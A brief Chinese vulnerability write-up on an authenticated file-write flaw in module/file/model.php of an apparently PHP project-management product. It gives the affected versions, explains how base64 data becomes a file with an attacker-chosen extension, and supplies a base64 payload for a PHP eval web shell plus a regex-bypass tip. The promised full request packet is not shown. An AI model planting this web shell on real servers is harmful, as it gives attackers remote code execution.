## 漏洞触发条件
需要登录
## 漏洞影响范围
开源版 7.3,专业版4.7.1 以及之前版本
## 漏洞代码分析
关键代码在`\module\file\model.php`,252-276行。
程序会提取data中的内容,经过base64_decode然后写入到文件中。文件的后缀来自image/后分号之前的内容。我们的data内容构造如下:
PD9waHAgZXZhbCgkX1BPU1RbdG1kXSk/Pg== 实际内容为 <?php eval($_POST[tmd])?>。为了满足正则表达式,引号之后要多加几个空格。
完整的数据包如下:
返回